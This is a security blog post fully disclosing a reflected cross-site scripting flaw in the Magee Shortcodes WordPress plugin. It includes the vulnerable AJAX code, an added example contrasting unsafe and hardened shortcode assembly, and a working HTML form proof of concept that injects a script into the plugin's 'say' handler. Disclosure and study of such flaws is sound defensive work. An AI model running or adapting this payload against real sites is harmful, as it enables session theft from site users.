28 Sep

Full Disclosure of Reflected Cross-Site Scripting (XSS) Vulnerability in Plugin with 30,000+ Active Installs

To close out our first week of fully disclosing vulnerabilities in WordPress plugins until the people on the WordPress side of things finally clean up the moderation of their Support Forum, we return to something from the first day and a reminder of why the Support Forum moderators’ behavior is harmful to actually improving security. We and others often find additional vulnerabilities based on seeing reports of other vulnerabilities (and with our Plugin Security Checker tool we help find even more), so the moderators’ deletion of reports of them on the Support Forum has a negative impact on improving security. Of course there is the other side of having the details of these vulnerabilities public, especially if they haven’t been fixed, but the best solution is to get them fixed. Once something has been disclosed it would be foolish to assume that people with bad intentions haven’t seen it, but the people on the WordPress side of things don’t seem to have a great grasp of how the Internet works. Thus the most important thing is to make sure the vulnerability is fixed, but what usually seems to happen is that the moderators simply delete the reports and then don’t bother to notify anyone who could do anything about fixing the vulnerability. That was the case with the first plugin we fully disclosed.

On Tuesday we discussed how Janek Vind’s report of a reflected cross-site scripting (XSS) vulnerability in FV Flowplayer Video Player led us to check the 1,000 most popular plugins to get an idea of whether there might be similar issues in other plugins, while considering adding a check for some instances of them to our Plugin Security Checker. Through that we found just such a vulnerability in a plugin with 700,000+ active installations according to wordpress.org. We also added a check that would catch that to our Plugin Security Checker.

We also found a related vulnerability in the plugin Magee Shortcodes, which has 30,000+ active installations according to wordpress.org, though not one that the Plugin Security Checker can catch, due to the more complicated path the variable used in it takes.

The plugin registers the function say() to be accessible through WordPress’ AJAX functionality whether the requester is logged in or not:

add_action('wp_ajax_say', array(&$this, 'say'));
add_action('wp_ajax_nopriv_say', array(&$this, 'say'));

In that function the value of the variable $shortcode is run through the do_shortcode() function and then output:

echo do_shortcode($shortcode);

Prior to that, code brings in user input from various locations and combines it into the $shortcode variable. In playing around with modifying the standard input for that, we found an input where JavaScript code could get output through that line of code, as can be seen in the proof of concept below, which is a reflected cross-site scripting (XSS) vulnerability. This type of vulnerability has almost no chance of being exploited on the average website, unless you were to believe the misinformation put out by other security companies.
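The following is an added example, not code from Magee Shortcodes or from this post: it reconstructs the general pattern of assembling a shortcode string from posted name/value pairs, first without validation and then hardened. The function names build_shortcode_unsafe() and build_shortcode_safe(), the attribute allow-list and the sample input are assumptions; the esc_attr() stand-in exists only so the file also runs outside WordPress.

```php
<?php
// Added example (not the plugin's code). It shows why letting posted values
// reach a shortcode tag unchecked lets user input leave the attribute list,
// and one way to stop that. Function names, the allow-list and the sample
// input below are assumptions for illustration.

// Stand-in for WordPress' esc_attr() so the file runs outside WordPress too.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Unsafe: values are dropped into the tag verbatim. A value containing "]"
// ends the attribute list early, so the rest of the user's text is no longer
// an attribute value: depending on how the string is assembled it becomes tag
// content or plain text outside the tag, and do_shortcode() escapes neither.
function build_shortcode_unsafe($name, array $pairs) {
    $attrs   = '';
    $content = '';
    foreach ($pairs as $pair) {
        if ($pair['name'] === 'magee_content') {
            $content = $pair['value'];
            continue;
        }
        $attrs .= ' ' . $pair['name'] . '=' . $pair['value'];
    }
    return '[' . $name . $attrs . ']' . $content . '[/' . $name . ']';
}

// Hardened: the shortcode name must be one we know, attribute names must be on
// that shortcode's allow-list, and values are quoted with "[", "]" and quotes
// removed, so nothing the requester sends can close or open a shortcode tag.
function build_shortcode_safe($name, array $pairs, array $allowed) {
    if (!isset($allowed[$name])) {
        return null; // unknown shortcode: refuse rather than guess
    }
    $attrs   = '';
    $content = '';
    foreach ($pairs as $pair) {
        $attr = isset($pair['name'])  ? (string) $pair['name']  : '';
        $val  = isset($pair['value']) ? (string) $pair['value'] : '';
        if ($attr === 'magee_content') {
            // Content sits between the tags; for a preview fed by the
            // requester, strip brackets (no nested shortcodes) and escape it.
            $content = esc_attr(str_replace(array('[', ']'), '', $val));
            continue;
        }
        if (!in_array($attr, $allowed[$name], true)) {
            continue; // drop attributes the shortcode does not define
        }
        $val    = str_replace(array('[', ']', '"'), '', $val);
        $attrs .= ' ' . $attr . '="' . esc_attr($val) . '"';
    }
    return '[' . $name . $attrs . ']' . $content . '[/' . $name . ']';
}

// Constructed input modelled on the shape of the request in this post; the
// "]" in the first value is the part that matters.
$posted = array(
    array('name' => 'magee_align',   'value' => ']<i>html</i>'),
    array('name' => 'magee_content', 'value' => 'Quoted text'),
    array('name' => 'magee_bogus',   'value' => 'ignored'),
);
// Assumed allow-list: which attributes the pullquote shortcode accepts.
$allowed = array(
    'pullquote' => array('magee_align', 'magee_class', 'magee_id'),
);

echo build_shortcode_unsafe('pullquote', $posted), "\n";
echo build_shortcode_safe('pullquote', $posted, $allowed), "\n";
echo var_export(build_shortcode_safe('notregistered', $posted, $allowed), true), "\n";
```

Run with php, the first line shows the "]" from the posted value closing the tag in the middle of the attribute list, while the second keeps the whole value inside a quoted attribute with the brackets gone and the unknown attribute dropped. Inside WordPress, an AJAX handler that echoes do_shortcode() output should additionally call check_ajax_referer() and require a capability such as current_user_can('edit_posts') before doing any of this, rather than being registered through wp_ajax_nopriv_ for anonymous requests.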

Proof of Concept

The following proof of concept will cause any available cookies to be shown in an alert box when logged in to WordPress. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=say" method="POST">
<input type="hidden" name="name" value="pullquote" />
<input type="hidden" name="preview[0][name]" value="magee_align" />
<input type="hidden" name="preview[0][value]" value="]<script>alert(document.cookie);</script>" />
<input type="hidden" name="preview[1][name]" value="magee_content" />
<input type="hidden" name="preview[1][value]" value="" />
<input type="hidden" name="preview[2][name]" value="magee_class" />
<input type="hidden" name="preview[2][value]" value="" />
<input type="hidden" name="preview[3][name]" value="magee_id" />
<input type="hidden" name="preview[3][value]" value="" />
<input type="hidden" name="preview[4][name]" value="magee-shortcode" />
<input type="hidden" name="preview[4][value]" value="pullquote" />
<input type="hidden" name="preview[5][name]" value="magee-shortcode-textarea" />
<input type="hidden" name="preview[5][value]" value="" />
<input type="submit" value="Submit" />
</form>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.